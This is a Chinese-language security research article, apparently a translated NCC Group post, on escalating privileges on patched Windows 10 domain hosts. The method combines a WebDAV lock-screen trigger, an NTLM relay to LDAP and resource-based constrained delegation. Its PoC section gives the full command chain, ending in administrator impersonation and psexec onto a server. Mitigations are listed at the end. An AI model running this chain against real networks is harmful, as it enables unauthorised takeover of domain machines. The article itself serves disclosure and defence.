如何在滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán)

本篇文章為大家展示了如何在滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán)，內(nèi)容簡明扼要并且容易理解，絕對能使你眼前一亮，通過這篇文章的詳細(xì)介紹希望你能有所收獲。

Objective

小編的目的是向大家展示，如何在打滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán)。你可能已經(jīng)注意到了[1]，這種攻擊并不新鮮，但我們已經(jīng)刪除了它的一些依賴項(xiàng)，同時(shí)我們也已自動化了該過程，以簡化我們的操作過程。

攻擊條件

截至本文撰寫，攻擊者仍需滿足以下條件，才能使用此技術(shù)妥協(xié)Active Directory計(jì)算機(jī)對象：

具有至少一個ServicePrincipalName (SPN)的帳戶。此帳戶將被配置為受害者系統(tǒng)上的“允許代表其他身份（Allowed To Act On Behalf Of Other Identity）”，并將用于調(diào)用S4U2self和S4U2proxy協(xié)議。

必須在受害計(jì)算機(jī)上安裝WebDAV Redirector功能。這是因?yàn)閃ebDAV客戶端不協(xié)商簽名，因此允許身份驗(yàn)證中繼到LDAP。

SMB中繼可以使用最近發(fā)現(xiàn)的signing/MIC NTLM繞過來實(shí)現(xiàn)，但這已被微軟修復(fù)了。[6] [7]

指向攻擊者計(jì)算機(jī)的DNS記錄。WebDAV客戶端將僅自動向Intranet區(qū)域中的主機(jī)進(jìn)行身份驗(yàn)證。這意味著使用IP而非主機(jī)名是行不通的。

訪問GUI以使用“Create your picture --> Browse for one”功能。其中一個步驟是由System（因此，計(jì)算機(jī)帳戶在網(wǎng)絡(luò)中）完成的，并且可以指定WebDAV路徑（\\maliciousWebDav@80\pics\pic.jpg）

以下信息對嘗試滿足上述依賴非常有用：

1. 默認(rèn)的Active Directory ms-DS-MachineAccountQuota屬性，允許所有域用戶向域中添加最多10個計(jì)算機(jī)帳戶[4]。另外，計(jì)算機(jī)帳戶具有其SPN屬性的值，因此允許使用S4U協(xié)議。

2. 在Windows 10上，默認(rèn)情況下已安裝WebDAV客戶端。在Windows Server 2012R2及更早版本中，需要桌面體驗(yàn)功能（Desktop Experience feature ）。 在Windows Server 2016及更高版本上，必須手動安裝WebDAV Redirector 功能。

3. 默認(rèn)情況下，經(jīng)過身份驗(yàn)證的用戶在Active Directory集成DNS（ADIDNS）區(qū)域中，具有“創(chuàng)建所有子對象”ACL。這樣可以創(chuàng)建新的DNS記錄。

前三個條件很容易滿足，因?yàn)樗鼈兇砹四J(rèn)的Active Directory和Windows配置。但是，GUI的依賴在我們的場景中著實(shí)是一個令人感到沮喪的限制。

通過命令行更改圖像

作為第一種方法，我們研究了使用API或Windows命令實(shí)用程序來更改配置文件圖像 - 但并沒有成功。然而，我們發(fā)現(xiàn)了通過對鎖屏圖像的操作可以暴露出相同的攻擊路徑。

以下截圖說明了這一點(diǎn)。

注意：在發(fā)表這篇文章前幾天，Elad Shamir發(fā)表文章稱他還發(fā)現(xiàn)了這個鎖屏圖像攻擊路徑。有關(guān)他的研究可以在[12]中找到。

在研究鎖屏圖像功能時(shí)，我們發(fā)現(xiàn)在本例中，可以使用API來執(zhí)行鎖屏圖像更改[3]。使用這個API，我們最終通過命令行實(shí)現(xiàn)了SYSTEM網(wǎng)絡(luò)身份驗(yàn)證。

編寫PowerShell腳本和C#程序集以利用此API。我們調(diào)用了實(shí)用程序Change-Lockscreen，它可以在以下鏈接中找到：

https://github.com/nccgroup/Change-Lockscreen

使用此工具，指示提供圖像的WebDAV的路徑，Change-Lockscreen將執(zhí)行導(dǎo)致所需網(wǎng)絡(luò)身份驗(yàn)證的操作。

請注意，默認(rèn)情況下，Windows 10具有一個名為Windows Spotlight的功能。此功能會自動下載并顯示鎖屏圖像。啟用此功能后，Change-Lockscreen將禁用它，并建立參數(shù)中指定的圖像（嘗試使用opsec）。但是，如果用戶設(shè)置了一個靜態(tài)的、自定義的鎖屏圖像而不是使用Spotlight，則Change-Lockscreen將備份該圖像，并在攻擊完成后將其放回原位。

演示視頻：

在Impacket中實(shí)施攻擊

最初，我們使用3xocyte（與Elad Shamir合作）開發(fā)的rbcd_relay.py委托中繼工具[5]。雖然這在我們的一些測試場景中非常有用，但它并沒有涵蓋我們所需的一切。因此，我們決定通過執(zhí)行pull請求，在3xcely的工作和SecureAuth的Impacket項(xiàng)目[13]中添加我們自己的內(nèi)容。

我們向ntlmrelayx添加了一個名為--serve-image的新標(biāo)志。使用此標(biāo)志，ntlmrelayx將提供指定的圖像以滿足攻擊的目的。

此外，為了利用WebDAV的服務(wù)器功能，有必要在httprelayserver.py中實(shí)現(xiàn)OPTIONS和PROPFIND方法。OPTIONS方法用于通知客戶端支持并啟用PROPFIND方法。它是PROPFIND請求，其中包括NTLM身份驗(yàn)證，因此這個請求將被中繼以執(zhí)行攻擊（示例請求如下圖所示）。

示例用法如下：

ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user machine$ --serve-image ./spot.jpg

這些功能已經(jīng)在Impacket中合并，你可以在以下位置找到：

https://github.com/SecureAuthCorp/impacket

PoC

以下是有關(guān)使用Change-Lockscreen和ntlmrelayx攻擊的視頻演示：

以下步驟對應(yīng)于上述視頻內(nèi)容：

1. 我們需要一個具有ServicePrincipalName屬性值的帳戶，才能調(diào)用S4U2Self和S4U2Proxy。我們可以濫用默認(rèn)的Active Directory ms-DS-MachineAccountQuota屬性，將計(jì)算機(jī)帳戶添加到域中并使用它（Powermad [11]）。

$pass = ConvertTo-SecureString ‘NCC1234!’ -AsPlainText -Force ; New-MachineAccount –MachineAccount s4umachine -Password $pass

2. 我們必須創(chuàng)建一個指向攻擊者機(jī)器（攻擊者IP）的DNS記錄（ImageServer.capsule.corp）。

$cred = New-Object System.Management.Automation.PSCredential (“CAPSULE\s4umachine”, $pass); Invoke-DNSUpdate -DNSType A -DNSName ImageServer.capsule.corp -DNSData 10.10.11.137 -Credential $cred -Realm capsule.corp

3. 我們通過使用low-priv用戶來更改鎖屏圖像來觸發(fā)Fileserver的網(wǎng)絡(luò)身份驗(yàn)證。

Change-Lockscreen –Webdav \\imageserver@80\

4. 使用ntlmrelayx，身份驗(yàn)證將中繼到LDAP。這允許我們修改機(jī)器的msDS-AllowedToActOnBehalfOfOtherIdentity屬性。

Ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user s4umachine$ --serve-image ./spot.jpg

5. 現(xiàn)在，我們可以使用受信任的計(jì)算機(jī)（S4UMachine$）模擬文件服務(wù)器上任意服務(wù)的任意用戶。

getST.py capsule\s4umachine:’NCC1234!’@fileserver.capsule.corp -spn cifs/fileserver.capsule.corp -impersonate administrator -dc-ip 10.10.11.128
Export KRB5CCNAME=administrator.ccache
Psexec.py -k -no-pass fileserver.capsule.corp

以下短視頻以圖形、概念化的方式向大家展示了攻擊中涉及的各個步驟。

緩解和檢測 

以下幾點(diǎn)有助于緩解和檢測此類攻擊：

由于此攻擊依賴于能夠?yàn)樽陨砼渲没贙erberos資源的約束委派的計(jì)算機(jī)，因此拒絕自己寫入msDS-AllowedToActOnBehalfOfOtherIdentity屬性的計(jì)算機(jī)上的新ACE，將有助于緩解此攻擊面。

對msDS-AllowedToActOnBehalfOfOtherIdentity屬性，實(shí)施適當(dāng)?shù)腟ACL將有助于檢測對此功能的修改。

最后，通過channel綁定啟用LDAP簽名，可以緩解使用此攻擊執(zhí)行的身份驗(yàn)證中繼。

上述內(nèi)容就是如何在滿補(bǔ)丁的Win10域主機(jī)上繞過圖形接口依賴實(shí)現(xiàn)本地提權(quán)，你們學(xué)到知識或技能了嗎？如果還想學(xué)到更多技能或者豐富自己的知識儲備，歡迎關(guān)注億速云行業(yè)資訊頻道。